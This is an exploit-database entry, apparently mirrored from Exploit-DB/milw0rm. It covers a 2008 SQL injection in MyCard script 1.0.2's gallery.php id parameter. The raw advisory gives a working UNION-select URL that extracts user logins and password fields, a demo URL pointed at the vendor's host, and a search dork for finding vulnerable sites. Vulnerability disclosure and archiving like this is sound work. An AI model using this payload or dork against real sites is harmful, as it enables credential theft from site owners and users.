header-logo
Suggest Exploit
vendor:
MyCard
by:
r45c4l
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MyCard
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:tufat:mycard:1.0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

MyCard script 1.0.2 (gallery.php?id) SQL Injection

MyCard script version 1.0.2 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information such as usernames and passwords. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'gallery.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable script. This will allow the attacker to gain access to the database and extract sensitive information.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
#        and all darkc0de and NikTrix members               ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com & niktrix.info
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title:  MyCard script  1.0.2 (gallery.php?id) SQL Injection
#
# VEndor: http://www.tufat.com/s_business_card_designer.htm
# 
#
###########################################################
#
# d0rk: Powered by MyCard
#
###########################################################
 
     POC :- 
	
	http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*        
   
     Live Demo: 
	
	For live demo first go here : http://demo.tufat.com/mycard/index.php and register and then u can test like this :

	http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login_id,0x3a,login_pass),2,3+from+pcard_user/*
 
###########################################################
#
#  Bug discovered : 28 Sep.2008
###########################################################

# milw0rm.com [2008-09-27]